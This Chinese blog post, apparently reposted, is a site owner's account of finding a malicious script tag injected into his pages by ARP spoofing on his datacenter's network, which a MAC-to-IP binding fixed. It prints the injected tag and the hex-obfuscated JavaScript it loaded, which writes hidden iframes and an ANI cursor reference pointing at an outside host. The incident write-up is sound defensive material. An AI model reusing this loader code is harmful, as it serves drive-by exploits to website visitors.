网站被黑的假象--ARP欺骗之页面中加入一段js

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了,赶紧到服务器上查看所有文件是否带有这串js代码,搜索结果没有,而且服务器也没发现被入侵的痕迹。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能从这段代码入手,我下载这个js开发发现是下面一段代码:
复制代码 代码如下:
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x44/x49/x56 /x73/x74/x79/x6c/x65/x3d/"/x43/x55/x52/x53/x4f/x52/x3a /x75/x72/x6c/x28/'/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x31/x2e/x67/x69/x66/'/x29/"/x3e"); 
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x44/x49/x56 /x73/x74/x79/x6c/x65/x3d/"/x43/x55/x52/x53/x4f/x52/x3a /x75/x72/x6c/x28/'/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x32/x2e/x67/x69/x66/'/x29/"/x3e/x3c///x44/x49/x56/x3e/x3c///x44/x49/x56/x3e"); 
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x69/x66/x72/x61/x6d/x65 /x73/x72/x63/x3d/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x30/x36/x30/x31/x34/x2e/x68/x74/x6d /x77/x69/x64/x74/x68/x3d/x31 /x68/x65/x69/x67/x68/x74/x3d/x31/x3e/x3c///x69/x66/x72/x61/x6d/x65/x3e"); 
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x69/x66/x72/x61/x6d/x65 /x73/x72/x63/x3d/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x74/x6a/x2e/x68/x74/x6d /x77/x69/x64/x74/x68/x3d/x30 /x68/x65/x69/x67/x68/x74/x3d/x30/x3e/x3c///x69/x66/x72/x61/x6d/x65/x3e") 

在google上搜索发现有人已经发现同样情况.http://0e2.NET/post/676.html
看了这篇文章之后了解到不是服务器被黑了,而是服务器所在的机房内网有中木马病毒的主机在搞arp欺骗.
这些木马捕抓了我的服务器发送出来的报文之后,篡改了报文的内容,在html头加入了前面那段木马病毒代码.然后再转发给访问我网站的用户主机.这段木马是针对ie的ani漏洞的,微软用户的电脑要赶紧升级打补丁.
最后问题就在于如何让我的服务器防止被ARP欺骗.打电话到机房,技术人员让我们将mac和ip地址绑定,问题终于解决.
关于ARP欺骗相关知识:
http://zhidao.baidu.com/question/7980952.html?si=1

JavaScript技术网站被黑的假象--ARP欺骗之页面中加入一段js,转载需保留来源!

郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。